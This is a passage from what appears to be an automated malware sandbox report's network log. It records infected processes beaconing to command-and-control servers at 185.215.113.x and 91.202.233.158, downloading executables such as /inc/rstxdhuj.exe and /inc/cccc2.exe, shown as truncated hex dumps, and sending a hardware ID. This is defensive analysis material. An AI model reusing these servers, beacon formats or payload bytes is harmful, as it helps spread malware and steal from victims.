                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:32.028491020 CEST56OUTGET /inc/rstxdhuj.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:32.247040987 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 986112
                                                                          Last-Modified: Tue, 24 Sep 2024 18:05:31 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f2ff6b-f0c00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL'1f! @@ `(!W@`` H.text `.rsrc`@@@.reloc`@Bd!HPGU"(*>(oV&*.s*0((o3(-j*~%(~oj@8(so&o s!o",i-,o#($o%o&o#(((co'o'co'co'o'co'co'co'o(j+)o)nXbXdao*X
                                                                          Sep 27, 2024 04:21:32.247054100 CEST1236INData Raw: 11 04 11 09 33 d1 06 06 1c 62 58 0a 06 06 1f 16 64 61 0a 06 06 1f 1e 62 58 0a 06 0c 08 21 8a 76 3a 65 45 59 3b eb 61 0c 7e 01 00 00 04 08 6f 0e 00 00 06 08 13 0a de 08 11 0b 28 2b 00 00 0a dc 11 0a 2a 41 34 00 00 00 00 00 00 4d 00 00 00 0b 00 00
                                                                          Data Ascii: 3bXdabX!v:eEY;a~o(+*A4MX5-P}.(-**0Ws,o-,o.+,o/+R(3*-*o(o.**o0*(1
                                                                          Sep 27, 2024 04:21:32.247075081 CEST1236INData Raw: 59 02 03 59 61 61 2a 1e 02 28 31 00 00 0a 2a 03 30 03 00 62 00 00 00 00 00 00 00 28 0b 00 00 06 20 92 0b 8b e0 66 66 65 66 65 65 66 66 65 65 66 61 d0 09 00 00 02 28 1a 00 00 0a 28 09 00 00 06 28 13 00 00 06 d0 0c 00 00 02 28 1a 00 00 0a 28 09 00
                                                                          Data Ascii: YYaa*(1*0b( ffefeeffeefa(((((((a Y7fefeffeef((*(1*0B((((((((((*(1*(((
                                                                          Sep 27, 2024 04:21:32.247085094 CEST1236INData Raw: 3c 00 00 0a 2c 02 06 2a 02 17 28 35 00 00 06 2a 00 00 00 1b 30 05 00 af 08 00 00 0a 00 00 11 20 48 e7 95 75 0a 20 44 2f 52 5f 06 59 0b 14 13 05 2b 12 7e 09 00 00 04 02 12 05 6f 3c 00 00 0a 2c 03 11 05 2a 16 13 3d 7e 09 00 00 04 13 31 11 31 12 3d
                                                                          Data Ascii: <,*(5*0 Hu D/R_Y+~o<,*=~11=(3~:()(!&)!~ 6>tXY`)s= ?OS?Yac(>(>& G?CaXc(>(>& TXa(>c(>& OOS
                                                                          Sep 27, 2024 04:21:32.247097015 CEST1236INData Raw: 42 00 00 0a 7e 0a 00 00 04 2c 09 7e 0a 00 00 04 13 16 2b 73 7e 0b 00 00 04 15 33 1c 7e 0c 00 00 04 6f 3c 00 00 06 20 7c d6 d1 63 06 61 07 58 61 11 17 61 68 13 25 2b 07 7e 0b 00 00 04 13 25 11 25 2d 05 14 13 16 2b 3f 7e 0c 00 00 04 11 25 6f 41 00
                                                                          Data Ascii: B~,~+s~3~o< |caXaah%+~%%-+?~%oA+$%G~_b_caRXi3~o=a QYYfefefeffefeaa X`3C~oA @YXab`b`b`e
                                                                          Sep 27, 2024 04:21:32.247107983 CEST1236INData Raw: 03 14 2b 1e 06 6f 2e 00 00 0a 25 2d 04 26 14 2b 11 6f 2f 00 00 0a 25 2d 04 26 14 2b 05 6f 1b 00 00 0a 0b 07 14 28 48 00 00 0a 2c 2d 07 28 36 00 00 06 0c 08 28 37 00 00 06 0d 09 2c 1c 09 8e 69 1e 33 16 09 16 91 20 b7 00 00 00 33 0c 09 1d 91 20 89
                                                                          Data Ascii: +o.%-&+o/%-&+o(H,-(6(7,i3 3 3*X%o-,Ao.%-&+o/%-&+o(H,(o(I,**0 i+{b% 3%X_,LcX
                                                                          Sep 27, 2024 04:21:32.247119904 CEST776INData Raw: 00 00 00 13 30 04 00 33 00 00 00 11 00 00 11 02 20 4e 88 53 fc 28 34 00 00 06 28 59 00 00 0a 0a 12 00 20 a8 88 53 fc 28 34 00 00 06 28 5a 00 00 0a 28 5b 00 00 0a 7d 22 00 00 04 02 28 31 00 00 0a 2a 00 8a 02 7b 22 00 00 04 28 5c 00 00 0a 75 50 00
                                                                          Data Ascii: 03 NS(4(Y S(4(Z([}"(1*{"(\uP%-&+(]u$*J{"s^(_*&sE*(1*.s~#*~5******************. S(4*
                                                                          Sep 27, 2024 04:21:32.247138977 CEST1236INData Raw: 1e 00 00 01 28 aa 00 00 06 2a 00 3a 02 03 04 8c 2d 00 00 01 28 aa 00 00 06 2a 00 26 02 03 04 28 aa 00 00 06 2a 00 00 56 02 03 6f 70 00 00 0a 04 8c 06 00 00 01 28 aa 00 00 06 26 02 2a 00 00 42 02 03 6f 18 00 00 0a 04 28 aa 00 00 06 26 02 2a 00 00
                                                                          Data Ascii: (*:-(*&(*Vop(&*Bo(&*Vo-(&*BoU(&*0L{%(3 S(45%%({*oq,(+*7@6(r(
                                                                          Sep 27, 2024 04:21:32.247152090 CEST1236INData Raw: 0a 6f 71 00 00 0a 07 6f 79 00 00 0a 2d dd de 0a 07 2c 06 07 6f 7a 00 00 0a dc 02 06 7d 32 00 00 04 2a 00 01 10 00 00 02 00 1a 00 27 41 00 0a 00 00 00 00 1e 02 7b 31 00 00 04 2a 1e 02 7b 32 00 00 04 2a f6 02 28 31 00 00 0a 02 03 25 2d 11 26 20 9b
                                                                          Data Ascii: oqoy-,oz}2*'A{1*{2*(1%-& S(4sz}3%-& S(4sz}4*{3*{4*6u,(*,*((oo,(o(** ^((oX )UUZ(
                                                                          Sep 27, 2024 04:21:32.247162104 CEST1236INData Raw: 53 fc 28 34 00 00 06 02 7b a9 00 00 0a 28 ab 00 00 0a 2a 4a 02 28 6e 00 00 06 7d 45 00 00 04 02 28 31 00 00 0a 2a 00 56 73 31 00 00 0a 80 42 00 00 04 73 f6 00 00 06 80 44 00 00 04 2a 00 00 1a 7e 44 00 00 04 2a 00 1a 7e 43 00 00 04 2a 00 1b 30 02
                                                                          Data Ascii: S(4{(*J(n}E(1*Vs1BsD*~D*~C*0- S(4 S(4szu<, S(4 *S(4sz~B(3~D{E3C*~C,~D}EC,(+*
                                                                          Sep 27, 2024 04:21:32.247173071 CEST672INData Raw: 04 2a 00 1b 30 02 00 1b 00 00 00 1e 00 00 11 02 7b 4f 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 31 01 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 f9 00 00 00 22 00 00 11 02 7b 4f 00 00 04 0b 07 2c 0b 07
                                                                          Data Ascii: *0{O.3(1*0"{O,.c}O}T}Us7o}V}O+{Vo}W{U}P}O}O{RY}R{R-+H{U{TX{RX


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.549751185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:32.339709997 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:33.053108931 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:33.054280043 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:33.290419102 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:33 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.549752185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:33.402616024 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:34.125428915 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:34.190855026 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:34.428586006 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.549753185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:33.948923111 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000342001&unit=246122658369
                                                                          Sep 27, 2024 04:21:34.673929930 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:34.675781965 CEST53OUTGET /inc/cccc2.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:34.905131102 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:34 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 367616
                                                                          Last-Modified: Wed, 25 Sep 2024 17:02:23 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f4421f-59c00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf> @ `S H.textD `.rsrc@@.reloc@B H_dKSk+GQJnjIk)E&E8_b$(#?o8b9~V4v1uT0^.Lb;5H^1|<`y54f~Y,S,WpS[6NkE^i&?on~!6AAJnxTHazcWng#u>A6KqcR9L;zs<j|I:wH$z]MHChDy>olMA]~o\Z1D#KhyOvEMA9YAe8E2&
                                                                          Sep 27, 2024 04:21:34.905147076 CEST224INData Raw: 5f b2 e2 9d d3 f6 eb c2 dc 56 a3 48 16 49 ce c2 e7 44 23 b3 d5 f1 18 07 b8 80 23 4d f5 4c 71 c4 b5 4c 44 23 80 a3 7b 8a c2 54 e4 8e 38 dc 31 70 ed c2 7b 6d 1b 91 05 b2 97 b2 49 76 2f 3a 82 93 35 37 38 4b e0 91 9d d7 e2 a9 1d 71 01 a1 d6 21 82 63
                                                                          Data Ascii: _VHID##MLqLD#{T81p{mIv/:578Kq!cWZU6)|Auyfd=N6B>djAd{pWs[)@LYD5i?n,*2mm69zP:?y@GC70t+n
                                                                          Sep 27, 2024 04:21:34.905158043 CEST1236INData Raw: 1f aa 17 9d 81 9c a2 56 c2 8d 08 13 2d e1 3c 53 c2 a9 45 7c 70 95 aa 38 93 b8 00 9e d5 28 3f dd c8 1f fc b1 0b 19 e4 8b aa 77 8f 99 69 3b 40 46 6a cb b0 c3 e9 0c 8e 51 93 2c 08 e5 5a d0 8c 3f b6 2a 45 bf ba dd f9 42 97 2f 05 ae ec 10 83 43 99 26
                                                                          Data Ascii: V-<SE|p8(?wi;@FjQ,Z?*EB/C&=CSHd(.lF~Y2g!%.laBt{NTsWq~|?t1B[0i6L8Y0-v:u
                                                                          Sep 27, 2024 04:21:34.905199051 CEST1236INData Raw: 0e fd 06 b2 cc e9 44 cf 96 73 ee 51 76 07 c3 05 e2 6d 87 65 fb bd 2f 0c 90 05 21 9e b8 f3 19 ad da 6d f0 fe 38 00 e7 e6 17 72 da d8 aa 62 41 c6 8c fd 74 68 34 cd 38 60 20 9e 94 92 f2 48 4d ba 26 8b 2e da 22 8f 78 de 4b b8 6c 00 f9 1a f6 82 bc bb
                                                                          Data Ascii: DsQvme/!m8rbAth48` HM&."xKlnR5A'%[TB/@dtI#rN%*\M'q/>[Ui-D\lI+hgk,^n-Y)eg9&7d`-UxEA
                                                                          Sep 27, 2024 04:21:34.905210018 CEST1236INData Raw: 28 c7 f7 9c 78 a3 9a 5d 79 18 52 6a 82 a9 6b d8 c6 ee 18 7d 62 92 d6 f5 0d 53 a4 79 2e 08 cf 9c 80 4a d9 b6 75 a0 21 49 4d 74 3f 80 25 98 0f 16 d9 a4 68 7b 90 94 d6 03 ba 97 8e 2a 63 fc 7b 0b 93 9c e5 1e b6 75 9c 94 49 c0 19 0b 99 f1 9d 29 43 08
                                                                          Data Ascii: (x]yRjk}bSy.Ju!IMt?%h{*c{uI)CMP$3zX;o/f&n9|:%{Avt{0\F-]grBcX*4U!`|,Il8N|UXz3E
                                                                          Sep 27, 2024 04:21:34.905221939 CEST272INData Raw: da f4 91 a0 5e 6f 5a 8c b4 7b ea e6 ff 5d ae 10 98 28 4a 28 55 5a a2 1a f0 c9 a0 cb 73 5b 03 ca 73 6f 7f 8a 19 68 c5 90 5c f5 0d 67 15 e8 1d 64 35 1e 49 fa aa 18 f0 30 0b e0 10 fc 63 13 03 a0 94 e4 fd a1 f0 42 64 c0 87 f8 da fa c5 42 d8 27 d0 f8
                                                                          Data Ascii: ^oZ{](J(UZs[soh\gd5I0cBdB'.9;BkGL.-kc>C_SpS7*Lke}QyG8U|NjJoI(~VlCTka;!?wXdGo%i|*E\^U~ Bwt/>
                                                                          Sep 27, 2024 04:21:34.905354977 CEST1236INData Raw: 83 41 97 d3 20 50 25 2b f5 a0 6e 31 df 6e bb 09 75 da 65 cd eb b4 ee 48 f4 f9 e7 2f 55 75 e0 4b 33 23 30 68 57 82 29 9c c7 47 7e 66 4c d3 ae 72 75 fd 86 60 03 4b 05 47 31 b9 0a 48 4a a5 e8 60 08 b0 e4 89 3f 5b 55 b0 36 35 45 94 d4 0f 95 dc cf 9e
                                                                          Data Ascii: A P%+n1nueH/UuK3#0hW)G~fLru`KG1HJ`?[U65Ek"o>$1.3FT?*U95GG/_CI-/l,?ZUiM'{%+A`fuva"_2/D$'fDtWd|_ky"WV8
                                                                          Sep 27, 2024 04:21:34.905366898 CEST1236INData Raw: 6d 76 17 e2 2a a9 8f a1 b3 65 46 a0 bf a6 2b d5 da 7d eb 07 a6 a9 5e e3 76 a0 0d 24 a1 44 55 00 0b 1b 55 99 35 69 21 67 0c 57 14 b7 3d 41 18 0e 76 93 a4 be a2 97 58 e0 4c 52 07 39 5d d7 8c df 0f 4f 99 59 46 98 39 de dd 30 2f 8e 84 8f fd 33 b5 73
                                                                          Data Ascii: mv*eF+}^v$DUU5i!gW=AvXLR9]OYF90/3s4DR6u),dzqdun0_2mj>zdt]sf1rfXuhsFDRv%9<EDlLFX7Z KLVk\C{leb
                                                                          Sep 27, 2024 04:21:34.905378103 CEST1236INData Raw: 6b 21 a9 b1 5b 10 c8 d7 09 f3 06 be a2 99 c7 0f 47 3c 18 fa 2b 6b 77 d4 a8 e6 3b 14 81 25 f6 08 00 36 62 d2 88 41 34 90 19 9f 34 aa 80 0a 81 0f 9c 73 00 66 9e b5 4e 65 91 21 0e af 66 f2 7f 1f 66 25 73 e7 74 b0 07 a4 42 a8 7f f3 9a 1c 87 02 20 91
                                                                          Data Ascii: k![G<+kw;%6bA44sfNe!ff%stB LVU(-t#lo_xS2$/x0boD$Ap>aO[I~P!7,Xw-A{ hx]&+$j+BbL3 vJ=zE)C\@%Vhq
                                                                          Sep 27, 2024 04:21:34.905390024 CEST672INData Raw: 56 12 6f a4 85 82 81 b4 15 19 2d 0e a5 3e ca b2 f5 a3 8b 96 30 29 61 6e 68 7f 61 9d 00 18 90 17 ee 32 bb 41 e2 2f a2 eb 57 d1 01 55 5b 62 8c ea 0d d0 ee 84 09 e7 83 47 df 74 65 52 9e ee ec 7c b1 2b 07 f5 80 a2 b1 c2 f5 f0 45 a7 ec b6 92 11 b9 aa
                                                                          Data Ascii: Vo->0)anha2A/WU[bGteR|+EYlVgd{RY'zc~?NT%=!pWUaR%r&{Uvb=IAU_^]WY;fBeL"5?%`K?aw&uoXK.7H8
                                                                          Sep 27, 2024 04:21:34.905802965 CEST1236INData Raw: 34 b7 44 f4 2a ca 50 c6 8e ae 60 d5 1a 50 51 1d 00 ab db 63 e4 8b a5 67 2b fa 82 77 af cf a4 f3 39 fb 87 7c de fb 8e 91 7f ae cc c3 1a 3b cb 9f a0 d0 68 12 a6 3e e3 c5 54 82 0a 86 20 30 fa ee d4 6d 8e 16 67 66 f2 bd 9e 38 25 7f c7 f3 50 44 61 c8
                                                                          Data Ascii: 4D*P`PQcg+w9|;h>T 0mgf8%PDaWH>6(R"5,RKS|gk$\TkT^}*>-c?]E|=|<wEc>ZhMEMaqD~


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.549754185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:34.585153103 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:35.297358990 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:35 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:35.317243099 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:35.552525043 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:35 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.54975591.202.233.158802000C:\Users\user\AppData\Local\Temp\svchost015.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:34.593863010 CEST89OUTGET / HTTP/1.1
                                                                          Host: 91.202.233.158
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:35.293293953 CEST203INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:35 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:35.321105957 CEST415OUTPOST /e96ea2db21fa9a1b.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHD
                                                                          Host: 91.202.233.158
                                                                          Content-Length: 214
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 48 44 42 4b 45 42 47 48 4a 4a 4a 4a 4b 45 48 44 2d 2d 0d 0a
                                                                          Data Ascii: ------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------JKJDHDBKEBGHJJJJKEHDContent-Disposition: form-data; name="build"default------JKJDHDBKEBGHJJJJKEHD--
                                                                          Sep 27, 2024 04:21:35.722311020 CEST210INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:35 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 8
                                                                          Keep-Alive: timeout=5, max=99
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                                                          Data Ascii: YmxvY2s=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
